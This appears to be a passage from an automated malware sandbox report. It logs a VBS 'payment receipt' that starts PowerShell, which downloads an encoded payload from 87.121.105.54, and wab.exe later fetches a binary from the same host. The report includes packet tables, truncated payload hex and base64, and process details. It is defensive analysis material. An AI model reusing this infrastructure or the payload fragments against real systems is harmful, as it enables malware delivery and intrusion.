                          May 4, 2024 09:52:14.829330921 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829344034 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.829355001 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.829377890 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829391956 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829404116 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.829405069 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829416990 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.829421043 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829435110 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829443932 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.829447031 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829461098 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829471111 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.829484940 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.829510927 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.829564095 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829577923 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829588890 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829596043 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829612017 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829619884 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.829627037 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829638958 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.829641104 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829655886 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829669952 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829672098 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.829683065 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829694986 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.829695940 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829710960 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829710960 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.829726934 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:14.829729080 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.829746008 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:14.829771042 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:15.598160982 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:52:19.524454117 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:19.524555922 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:49.552936077 CEST804973787.121.105.54192.168.2.4

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          May 4, 2024 09:51:32.153351068 CEST6380653192.168.2.41.1.1.1
                          May 4, 2024 09:51:32.314074993 CEST53638061.1.1.1192.168.2.4

                          ICMP Packets

                          TimestampSource IPDest IPChecksumCodeType
                          May 4, 2024 09:51:32.324956894 CEST192.168.2.4142.250.72.1744d5aEcho
                          May 4, 2024 09:51:32.484157085 CEST142.250.72.174192.168.2.4555aEcho Reply

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          May 4, 2024 09:51:32.153351068 CEST192.168.2.41.1.1.10xb1fdStandard query (0)google.comA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          May 4, 2024 09:51:29.243855953 CEST1.1.1.1192.168.2.40xfde9No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                          May 4, 2024 09:51:29.243855953 CEST1.1.1.1192.168.2.40xfde9No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                          May 4, 2024 09:51:32.314074993 CEST1.1.1.1192.168.2.40xb1fdNo error (0)google.com142.250.72.174A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • 87.121.105.54

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.44973187.121.105.54807316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          TimestampBytes transferredDirectionData
                          May 4, 2024 09:51:39.030721903 CEST172OUTGET /Oxaluria209.smi HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                          Host: 87.121.105.54
                          Connection: Keep-Alive
                          May 4, 2024 09:51:39.338871956 CEST1289INHTTP/1.1 200 OK
                          Date: Sat, 04 May 2024 07:51:39 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Fri, 03 May 2024 09:05:28 GMT
                          ETag: "65b90-617890559e600"
                          Accept-Ranges: bytes
                          Content-Length: 416656
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/smil+xml
                          Data Raw: 36 77 49 31 78 65 73 43 4b 2f 75 37 61 51 6b 51 41 48 45 42 6d 33 45 42 6d 77 4e 63 4a 41 52 78 41 5a 76 72 41 68 34 39 75 66 36 69 38 31 5a 78 41 5a 74 78 41 5a 75 42 38 65 58 62 48 63 31 78 41 5a 76 72 41 68 45 79 67 66 45 62 65 65 36 62 36 77 4c 6f 49 58 45 42 6d 2b 73 43 47 2f 66 72 41 73 4b 35 75 75 63 53 73 37 4a 78 41 5a 74 78 41 5a 74 78 41 5a 74 78 41 5a 73 78 79 75 73 43 59 6f 46 78 41 5a 75 4a 46 41 74 78 41 5a 76 72 41 6b 62 57 30 65 4a 78 41 5a 76 72 41 6f 65 2b 67 38 45 45 63 51 47 62 36 77 4c 79 44 49 48 35 56 35 6e 42 42 48 7a 4d 36 77 4b 42 6b 4f 73 43 58 49 61 4c 52 43 51 45 63 51 47 62 63 51 47 62 69 63 4e 78 41 5a 76 72 41 6c 74 74 67 63 50 61 4e 66 63 42 36 77 4a 58 34 4f 73 43 6f 31 75 36 38 54 38 61 49 75 73 43 4a 62 52 78 41 5a 75 42 38 6a 63 6f 35 74 66 72 41 71 58 4c 63 51 47 62 67 63 49 36 36 41 4d 4b 36 77 4c 67 50 2b 73 43 50 52 4e 78 41 5a 76 72 41 69 55 6d 36 77 4b 4d 6b 4f 73 43 38 55 53 4c 44 42 42 78 41 5a 76 72 41 76 6d 52 69 51 77 54 63 51 47 62 36 77 49 50 77 45 [TRUNCATED]
                          Data Ascii: 6wI1xesCK/u7aQkQAHEBm3EBmwNcJARxAZvrAh49uf6i81ZxAZtxAZuB8eXbHc1xAZvrAhEygfEbee6b6wLoIXEBm+sCG/frAsK5uucSs7JxAZtxAZtxAZtxAZsxyusCYoFxAZuJFAtxAZvrAkbW0eJxAZvrAoe+g8EEcQGb6wLyDIH5V5nBBHzM6wKBkOsCXIaLRCQEcQGbcQGbicNxAZvrAlttgcPaNfcB6wJX4OsCo1u68T8aIusCJbRxAZuB8jco5tfrAqXLcQGbgcI66AMK6wLgP+sCPRNxAZvrAiUm6wKMkOsC8USLDBBxAZvrAvmRiQwTcQGb6wIPwEJxAZtxAZuB+uxWBAB11XEBm3EBm4lcJAzrAk+hcQGbge0AAwAAcQGb6wJmp4tUJAhxAZvrArvTi3wkBHEBm+sCu1GJ63EBm3EBm4HDnAAAAHEBm3EBm1PrAinE6wINl2pA6wKpo+sCgIWJ63EBm3EBm8eDAAEAAACw1ATrApOzcQGbgcMAAQAAcQGbcQGbU3EBm3EBm4nr6wJuJ3EBm4m7BAEAAHEBm3EBm4HDBAEAAHEBm3EBm1NxAZvrAgIzav9xAZtxAZuDwgVxAZtxAZsx9nEBm3EBmzHJcQGb6wJ/UIsa6wJcd+sCh45B6wJhA+sC34M5HAp18usCn2VxAZtGcQGb6wL964B8Cvu4ddzrAnFO6wLp5YtECvzrAkHz6wKW4inwcQGbcQGb/9LrAuTVcQGbuuxWBABxAZtxAZsxwOsCyN3rAjxli3wkDOsCRFPrAscQgTQHQEC+5+sCqfXrAuvCg8AE6wIRJusCxVE50HXi6wKRhOsC4WeJ+3EBm3EBm//X6wJdMOsC/NLJpTdier9BGPi9Euy8bfDZN2eLV4CaGOKhFA9qaYQ1Ynq/QRjErOtupfkKcv63PxbpusHNtoNQZrELW5bgwVfZyvDDDFSK9PE0enfMhH9zLQpWyt2Ja3rYjYf6
                          May 4, 2024 09:51:39.338915110 CEST1289INData Raw: 36 6b 42 35 77 6f 62 69 77 63 72 71 51 4c 67 4f 6b 49 66 42 79 75 70 41 53 42 77 36 70 4d 56 76 5a 69 78 4e 76 69 34 75 69 7a 2b 42 77 62 6d 73 58 58 6d 5a 65 57 4c 59 51 62 37 6e 46 39 69 57 61 43 5a 35 62 6d 62 74 32 4c 2f 6e 51 46 42 36 64 4d
                          Data Ascii: 6kB5wobiwcrqQLgOkIfByupASBw6pMVvZixNvi4uiz+BwbmsXXmZeWLYQb7nF9iWaCZ5bmbt2L/nQFB6dMnBC39BQL4EjYIr35PEbWbt2L/nQOGnsdDESoHFk/8Yzdi/50A1Sd+0ATobh8Xt5UBAJPItOtjegcELtEJAvvYyqHRm9RO850D0bh2JJkkgDjg/ShNCvueH9cGexIOFahNCvudPxekYv7/YEIEYzBGFzjomeZDY3ov
                          May 4, 2024 09:51:39.339021921 CEST1289INData Raw: 69 4e 6a 67 7a 57 78 4b 44 66 2b 2b 32 77 74 4c 35 39 77 4f 64 7a 74 64 4b 68 67 77 69 6b 6d 2b 37 32 2b 56 6a 2f 53 55 38 53 6e 35 47 4f 74 48 31 61 77 47 30 4b 2b 62 76 58 67 76 2b 64 41 2f 6b 52 74 30 4f 72 6f 57 65 4c 2b 55 78 66 42 74 70 62
                          Data Ascii: iNjgzWxKDf++2wtL59wOdztdKhgwikm+72+Vj/SU8Sn5GOtH1awG0K+bvXgv+dA/kRt0OroWeL+UxfBtpbcTaQ/IUAongzJfrZPrwGtqTiaPEJwEeC1+rGet9/BVFip0VVmsnKIWfMQIm6gSa56xIjM61zFN/ujuezO1X6eZiPrN05fzB7TmwWJY5AYOyUawUj7578ntPuo+YRzwU0ArNveZoO6IkefwU3uCdmNt9zJXuZY3dje
                          May 4, 2024 09:51:39.339037895 CEST1289INData Raw: 4a 54 56 74 6c 49 52 4c 35 75 78 51 43 2f 35 30 42 50 76 2f 4e 6b 51 4c 37 6e 51 45 43 2b 58 38 4f 37 32 39 78 63 6e 39 73 4f 48 63 76 38 34 2b 6c 6e 41 54 50 59 78 48 75 56 75 4a 49 56 64 55 4a 51 4e 52 34 45 47 4b 52 42 77 6c 75 7a 59 56 6b 62
                          Data Ascii: JTVtlIRL5uxQC/50BPv/NkQL7nQEC+X8O729xcn9sOHcv84+lnATPYxHuVuJIVdUJQNR4EGKRBwluzYVkbxQEbyTvZQkC+Kwfn9L2WExFQsekGdrWpXZtQJJFS/Vv2AJpg1T7f0mMi50wptvib816gdUxvL4DtXCCeThjBs/gJnJE/FF3kyAnBq8lxGYA3/D+c73otQVBA2e4LZ6d17/ePHPa8RTraiVhF4zH6hu5sxX6850AXA
                          May 4, 2024 09:51:39.339051008 CEST1289INData Raw: 66 42 64 4f 73 33 62 65 32 42 66 62 39 43 67 58 73 33 4f 2b 66 62 79 45 71 6a 68 79 44 43 55 6f 54 36 57 33 70 75 34 54 45 68 48 33 4e 6d 4b 5a 49 38 6a 52 4b 65 73 72 6a 56 69 41 39 6f 57 33 6f 51 56 48 68 35 30 42 41 76 75 64 41 36 2f 49 56 68
                          Data Ascii: fBdOs3be2Bfb9CgXs3O+fbyEqjhyDCUoT6W3pu4TEhH3NmKZI8jRKesrjViA9oW3oQVHh50BAvudA6/IVhIEapgnvdCaiI1jVTyCu454DOSI+BR15xI/WFadgWW7d1r/nQIyiDGRcIe6G+oJ7rme0Jvj7nLU6pHLerDKe3BeVoWTUmjFTOeB4Ael8dbrEGD8UBUikSU+Hh6JAQL7nQEAFdm9ut1e8LAPb3/oWtzOaEIrRN4J00K
                          May 4, 2024 09:51:39.339121103 CEST1289INData Raw: 76 75 64 41 51 42 48 63 6e 4f 42 54 73 4a 72 78 47 46 66 31 55 37 77 6d 41 41 49 61 74 52 4d 43 2b 73 39 48 77 6c 5a 75 2f 55 75 38 35 30 41 57 41 48 58 4a 6f 38 64 6d 74 6c 77 77 61 4d 6a 42 53 48 70 45 39 55 70 6d 68 75 2f 74 38 71 33 42 55 43
                          Data Ascii: vudAQBHcnOBTsJrxGFf1U7wmAAIatRMC+s9HwlZu/Uu850AWAHXJo8dmtlwwaMjBSHpE9Upmhu/t8q3BUCUVrky33Mle5nDd2GKBOKJLc2xwctq1JU7PG+dNWbumM16RH53KOCq9tzD4JCVp4GvfCEggexiGAh7/c7+Vwe5fBYgzvXW22QgmdQ1JInzpe8mnt+DdxHWdSC8TeCeSPbas3F9c/qlF37wf6FlwdZfdw77e6M5Ri+N
                          May 4, 2024 09:51:39.339135885 CEST1289INData Raw: 61 6c 47 5a 6f 61 79 4f 34 76 68 45 79 4a 75 6f 30 6d 4e 65 6e 6d 32 78 75 39 45 4b 63 6c 58 6b 77 61 67 45 74 6f 44 72 34 4c 51 6c 68 75 5a 55 71 35 37 35 79 5a 35 5a 4c 78 34 70 2b 42 6d 73 71 4f 56 56 6f 54 42 54 48 45 65 38 2b 38 72 51 37 71
                          Data Ascii: alGZoayO4vhEyJuo0mNenm2xu9EKclXkwagEtoDr4LQlhuZUq575yZ5ZLx4p+BmsqOVVoTBTHEe8+8rQ7qm2F/9NKq+4AwLo6HprAMGJsirnB40KS8AObgr/pt9RpChrZfu9oLAQrXL1ZzlQEByavLEDvH3xMY92cHt7XZ2VSfGuGW3+F7e2L11s3vZHIv0veYfsdzJWO5G3TonMFGwBbXK8R+V4yW5GYvlKvndR/6NQJ7fgR6G
                          May 4, 2024 09:51:39.339150906 CEST1289INData Raw: 31 31 53 7a 47 6b 77 62 4a 2f 32 7a 6d 55 50 78 57 47 45 74 7a 76 77 62 49 51 6c 64 54 66 4e 2b 58 7a 48 6f 2f 75 51 63 2b 49 59 74 6b 76 63 63 2f 34 74 67 6c 5a 72 38 57 6c 76 63 47 33 73 74 56 34 33 72 45 67 63 33 4f 2b 35 30 42 41 76 75 66 74
                          Data Ascii: 11SzGkwbJ/2zmUPxWGEtzvwbIQldTfN+XzHo/uQc+IYtkvcc/4tglZr8WlvcG3stV43rEgc3O+50BAvuftKajx8Scf61Qv9cRHcp2FHOzawzknGbDL/V3mQEByYnWNmwfIaVn/0m+CroTiYqPD5FRdzYM/J5y2ob9PRzVZQEC+50BAHoE7EkHsjRiHw6+S8p4w3Sw6Ljm498IgZIl8jdxFA8dqwr/1/uZAQFZsbUS+6Idxu+dAQ
                          May 4, 2024 09:51:39.339165926 CEST1289INData Raw: 46 30 43 58 4a 50 79 53 2b 76 45 57 30 77 62 4d 35 53 30 6e 4d 50 77 78 2f 36 73 71 73 77 61 76 32 56 72 4e 46 4e 2f 54 32 39 49 62 50 64 5a 73 46 78 65 36 39 61 77 71 51 4c 39 49 72 4f 2b 36 71 2f 73 76 56 58 37 43 6b 35 73 49 6d 77 68 33 72 78
                          Data Ascii: F0CXJPyS+vEW0wbM5S0nMPwx/6sqswav2VrNFN/T29IbPdZsFxe69awqQL9IrO+6q/svVX7Ck5sImwh3rxxvJQLHL9XnmQEA3YuNBvuf4deOaxHVemfN2i7kctOcr3JWxzZIRAilv2aaC7SBOCgkuO7lty8Hdq0+/JadAvudAQL51Rd6bhed3VPgdQ3Gb9XWzU0j6vLeM8hKJ/VqPM/3ELsOQt/CPdez++G6PJdO7/1Xwy8Ud5k
                          May 4, 2024 09:51:39.339179039 CEST1289INData Raw: 35 78 4d 41 6a 45 4f 48 4a 52 71 32 66 34 41 65 79 66 76 44 4b 41 47 35 71 50 4b 4d 66 6e 67 45 79 62 33 4e 50 67 6e 30 51 70 74 65 36 58 59 47 51 72 6f 4b 74 42 37 55 61 4f 52 4a 67 38 4b 59 30 71 69 62 4b 44 2b 70 4d 77 66 56 62 2f 53 6f 56 44
                          Data Ascii: 5xMAjEOHJRq2f4AeyfvDKAG5qPKMfngEyb3NPgn0Qpte6XYGQroKtB7UaORJg8KY0qibKD+pMwfVb/SoVD/TZAEe/tHBisMWy/FuFv6XsKTEPxGNqSHKwa6vEUPyPxEQhckQyX501ANP9DEiMBG94B6lYcr9BBTMkG3TtULJaeVRzoZ2vfK5wUSaTZOm648ZK7FrFv4vHCHBPxGuKI2swa6sN3CPPxHs69OmwYaua/QFN+ldwi2
                          May 4, 2024 09:51:39.643627882 CEST1289INData Raw: 6f 63 62 52 69 5a 50 77 56 47 72 49 52 39 36 5a 72 66 39 5a 6b 79 67 77 56 47 39 36 46 70 42 74 4e 7a 4a 58 65 5a 37 33 54 6f 32 4e 45 77 7a 75 64 34 67 5a 53 74 4b 48 6a 30 49 50 52 43 45 67 63 57 54 35 57 4b 52 48 7a 2f 6a 5a 45 70 76 33 72 38
                          Data Ascii: ocbRiZPwVGrIR96Zrf9ZkygwVG96FpBtNzJXeZ73To2NEwzud4gZStKHj0IPRCEgcWT5WKRHz/jZEpv3r8XAd2jro9mt+lWOB/BeYq1ji+x3MlY5n7dOzQ5YxHf5U6tdhOYAf1HkYPHR2FlBkJVz1TDvSDWtTS1RUHhhrRVS0XDHpLFlSHMGK7YgXvftB6HLR/BusNucaJ+ydVA5kBABADpC10rAgqhfCIh/QtLwr8WkcFUKv5S


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.44973787.121.105.54807948C:\Program Files (x86)\Windows Mail\wab.exe
                          TimestampBytes transferredDirectionData
                          May 4, 2024 09:52:13.286463976 CEST174OUTGET /vKdsOriqv105.bin HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                          Host: 87.121.105.54
                          Cache-Control: no-cache
                          May 4, 2024 09:52:13.597558975 CEST1289INHTTP/1.1 200 OK
                          Date: Sat, 04 May 2024 07:52:13 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Fri, 03 May 2024 09:02:07 GMT
                          ETag: "42040-61788f95ee1c0"
                          Accept-Ranges: bytes
                          Content-Length: 270400
                          Content-Type: application/octet-stream
                          Data Raw: 5b 80 0b 93 9b 3a 1f 63 0a 59 45 5c d1 6b c9 53 9f 09 4a e5 bd 85 09 17 c3 02 21 b7 6f ee e5 f9 a3 44 78 a3 a0 75 4a d4 82 db eb 38 6f ff 1c 8e 5e d7 66 f8 3a d9 31 c4 a4 1e 2b dd 43 33 1a 38 08 72 9d b6 8b c2 4e 43 65 ce 66 35 bb d3 95 a6 6a c2 6a 7b 6e f5 72 58 34 dd f3 df a4 3e e8 c7 2b 5e 06 8b f4 67 35 33 b0 55 eb 83 bc cd 6c 8c da 06 d2 cf 51 2d e7 ad b1 96 1c ea 0f 42 50 82 98 c7 4a a3 26 ce 46 19 7c c4 dc 13 44 33 89 7e c4 7b 8b 10 a1 5a ee be 6f 6e cf 24 6d 3c e2 fd 9f cd 38 56 73 0e 76 b6 fe af b9 8f 40 4b 31 e0 cd 02 ec 34 d1 60 ee 5f ca 7b 28 02 e2 2f 0e 3d 4b c3 d2 e8 f1 45 c8 90 f8 8b 56 4e 3d 6c 9d b0 71 a4 7a d7 0d df e3 6e 1a bd 3d 6b 1a ec 8a fa 78 e5 73 78 e6 f0 e7 19 d5 2d b0 f5 98 c3 33 d3 2f 5b 0a 82 5c d8 19 3e 6a 91 fa 92 8b 0e c5 3e 60 f4 20 43 7a 65 66 08 44 bf d7 ab 48 43 d3 a8 5c e1 cc 3e 89 47 6b f0 7d 67 75 83 b1 dc 77 ef 84 a2 f6 8b af ca c6 f2 3d 2c 5d 30 1b 4b df fa 74 77 b1 dc 0a 09 e0 e9 55 7d ce 8a 6f f2 c2 58 49 46 41 d7 76 f1 de 09 24 4b f1 79 b6 20 18 d1 bc d0 [TRUNCATED]
                          Data Ascii: [:cYE\kSJ!oDxuJ8o^f:1+C38rNCef5jj{nrX4>+^g53UlQ-BPJ&F|D3~{Zon$m<8Vsv@K14`_{(/=KEVN=lqzn=kxsx-3/[\>j>` CzefDHC\>Gk}guw=,]0KtwU}oXIFAv$Ky w\X~")aS7mKo;M&"O:>%/I]jz`#_M"UJD0|n?s? ~1_l~;?"s7""7[>81!DLo*WLQ~e0`]Ks_t%:'agvwVFX+9p\GO!Uu6R;S^ NsiTFO <^EPf&mhQP0JskFb% uXmuB"!hMl}mH\,7Fi7t#C&;d`0raZ]FF4EX=xRUV5YK?(EQ>6h|=E0uAP1.uWmNgH7^%9WNfH<AcXL NE!d:&|CMV/p5=1jW&h*>>B<e:[9FS7rx% [TRUNCATED]
                          May 4, 2024 09:52:13.597573042 CEST1289INData Raw: bc b8 4d d9 e5 56 b3 14 00 de 23 d4 7b 3c 90 60 78 93 15 72 12 1c 86 26 2d f7 40 46 5a 7c 9f de a5 ff 4c 09 27 40 2f 3b 7b 7b 6c 12 9d 6e 80 c9 45 ed 2f be cd a2 7e 19 a4 2d 23 3f 64 4b 03 0e 84 9e ec 21 29 01 3e 0b 76 f1 3c 4c 71 45 28 d8 e4 63
                          Data Ascii: MV#{<`xr&-@FZ|L'@/;{{lnE/~-#?dK!)>v<LqE(cNCeX]%{m4 E+^g53UlQ-BP&zO]|_`5GRZ3S|bmQmU{(/=2H%c1Ck$7&bC
                          May 4, 2024 09:52:13.597742081 CEST1289INData Raw: 09 62 43 d8 8b da 90 80 ea 87 44 d3 9d a5 a3 54 20 2f 5b 0a 82 5c d8 19 3e 3a d4 fa 92 c7 0f c4 3e af 1c 92 23 7a 65 66 08 44 bf d7 ab a8 43 d1 a9 57 e0 c7 3e 89 49 6f f0 7d 67 75 83 b1 dc 77 ef e4 b7 f6 8b af da c6 f2 3d 0c 59 30 1b 4b 9f fa 74
                          Data Ascii: bCDT /[\>:>#zefDCW>Io}guw=Y0KtgS}oXOFAv$ky"w\Z~")qS7m[o;M&"O:>%/I]jz`#_M"UJD0|n?s? ~1_l~;?"s7""7[>
                          May 4, 2024 09:52:13.597788095 CEST1289INData Raw: 22 37 5b b7 95 3e b6 d5 38 31 f5 1d 9a 21 44 db 4c 6f 9b ad aa a4 2a f9 db ce 0e 57 ca a6 4c 51 f9 7e e7 8b 1f 4b fb b0 ae 61 30 e3 85 22 11 9f 07 60 4d d7 18 8b f0 c1 8e 4b 63 c9 93 e6 00 5f 74 15 e4 88 25 3a c7 f0 1b 96 ef 27 01 67 11 76 cf c2
                          Data Ascii: "7[>81!DLo*WLQ~Ka0"`MKc_t%:'gvwVFX+9p\GO!Uu6R;S^ NsiTFO <^EPf&mhQP0JskFb%
                          May 4, 2024 09:52:13.597803116 CEST1289INData Raw: 23 08 1e 1c 60 0d 46 7a 8e dd 06 4d 85 c3 f1 50 d7 e5 4c 69 e8 e2 e4 cb ee b8 f3 64 21 af 08 55 86 ba ae 21 98 58 9d 2e 1f cf 93 a6 03 1f c0 9e 48 ec 69 61 cf 49 ad e1 91 21 e9 20 91 48 14 a2 b9 63 9b 3b 86 86 08 47 ae 64 aa b3 ec ca 30 72 db 4a
                          Data Ascii: #`FzMPLid!U!X.HiaI! Hc;Gd0rJ]B^l:\TO~GlR{U.e)@y$Ta(Ec2z&=@h|E0u%ABY!fW;jgHC.Z$^}Hbc,mDN~*-eKA
                          May 4, 2024 09:52:13.597815990 CEST1289INData Raw: e8 7a 4a b5 9a a6 77 9b 1d 21 fe 64 50 26 65 f9 13 5b 04 e2 1d 7c e3 d6 d1 8f ca 96 87 a9 56 67 ce 93 82 84 9a 57 09 86 1d 83 25 a3 79 94 2f d5 16 b9 ad 3e af 45 8a b5 39 34 98 65 c5 e4 24 ad a2 ae fe 22 69 f9 1d 08 9d 52 82 10 88 37 e4 fb c8 0b
                          Data Ascii: zJw!dP&e[|VgW%y/>E94e$"iR73p:l55sN|i1+JQBE+Rv.~Rmm$w'@Sb61\K<T:CZV|=re!-O8c<Q p431gob,0+
                          May 4, 2024 09:52:13.597827911 CEST1289INData Raw: d1 0d dc 39 a7 ae 63 1d dd c1 75 37 53 01 57 dd 71 54 8a 69 4f d4 21 a7 56 1a 81 23 c1 ae 28 fe df 74 43 8d 82 aa 47 3a 18 a9 cd a8 89 19 19 2c b4 2c 50 8e 76 35 99 45 28 aa 76 af 3d 9e 19 6c dd 51 ff 36 5b fc 63 ff a9 f5 0b 2c df fc c8 c5 50 82
                          Data Ascii: 9cu7SWqTiO!V#(tCG:,,Pv5E(v=lQ6[c,P`6Q9g6q&_5p',+DY /OrL>NCzeMu>N}gu`xp'IKsvOS~.:6hy?Wxp\Z~q"!eeIJ
                          May 4, 2024 09:52:13.597841024 CEST1289INData Raw: 6c cc 62 c1 61 db 71 f0 c7 1d 2e 55 bf 22 4d d0 be e3 4d e5 7c 48 06 9d 26 0e ab b3 7d 3b 54 b8 d5 63 c4 23 5a fb 4a c0 c5 cc b3 28 78 81 3c 2a d8 e7 de 44 b6 c8 d7 23 64 a0 57 50 48 c5 0b dd aa d7 04 38 c8 65 a6 8e 1d bb a2 e1 83 02 de 56 c6 e7
                          Data Ascii: lbaq.U"MM|H&};Tc#ZJ(x<*D#dWPH8eV*t.\ss?":$TXT^16]Lj3qAW>|>0A6U8qJtuhy}tD+8Z](&6v!U9tx0x
                          May 4, 2024 09:52:13.598529100 CEST1289INData Raw: bd 4c c1 0a c3 51 4c bc d0 17 55 9b 76 10 fa ea db 1f 55 f9 c7 9d 17 5d 09 47 e8 ab 67 3c 5f 51 a5 5a b8 18 bd 3e bf ef fe cc b3 f8 3c d5 df 80 e5 d5 f9 69 a4 ed 07 b7 31 73 d0 ee 11 c5 51 a5 38 24 3f 8c 3f cf f4 93 6c f0 15 37 a8 77 ce 4e f6 ac
                          Data Ascii: LQLUvU]Gg<_QZ><i1sQ8$??l7wNu=;9xsbStPg7cz+"&7R3@Fk~,D_u77GssdCc+E]]0D*MDe=!q=EZT[
                          May 4, 2024 09:52:13.598553896 CEST1289INData Raw: a8 20 59 4b ff 49 f5 ea a1 3b 9b 28 45 60 4a 09 b5 56 a7 8c 19 d8 42 ba 37 aa 8c 35 37 97 ff 68 d3 bb ad e2 9e 68 7c 3d 7b b6 97 58 a9 5f ee 28 bb 55 67 c3 31 12 07 b9 f5 5b 5f fe 06 0b 25 64 18 88 38 d9 b5 88 a0 90 f1 4c 06 86 69 d5 24 ba 1d 30
                          Data Ascii: YKI;(E`JVB757hh|={X_(Ug1[_%d8Li$0x[G^s)<k@pN=<f8z{u&<XpXBStSoJ.dwrv+N<pPq]z{hX(/W8LG{DEeaW%{;
                          May 4, 2024 09:52:13.905087948 CEST1289INData Raw: ea 8d 9b 59 7e 25 ec a7 12 ae 3b 79 9f de 26 3b 44 b1 ac 34 2f 3b c2 13 6c 12 9d e3 e4 ed 45 d6 d6 b1 82 5b 36 6c 5c 6e a2 c4 64 4a 03 0e f8 11 13 54 25 89 7b d2 89 84 34 c4 34 92 a5 5d 34 9d 3d b1 13 8d 21 e5 dd b2 db 99 29 12 49 96 7b 6d 6b af
                          Data Ascii: Y~%;y&;D4/;lE[6l\ndJT%{44]4=!)I{mk" +t:|z{7(1OV/<au&zl)~Vlc_ACyS53S`C3aaJ]iZos!ca50Y:~MbJly((p


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:09:51:27
                          Start date:04/05/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs"
                          Imagebase:0x7ff6e0830000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:1
                          Start time:09:51:31
                          Start date:04/05/2024
                          Path:C:\Windows\System32\PING.EXE
                          Wow64 process (32bit):false
                          Commandline:ping google.com -n 1
                          Imagebase:0x7ff6ac150000
                          File size:22'528 bytes
                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          General

                          Target ID:2
                          Start time:09:51:31
                          Start date:04/05/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:3
                          Start time:09:51:31
                          Start date:04/05/2024
                          Path:C:\Windows\System32\PING.EXE
                          Wow64 process (32bit):false
                          Commandline:ping %.%.%.%
                          Imagebase:0x7ff6ac150000
                          File size:22'528 bytes
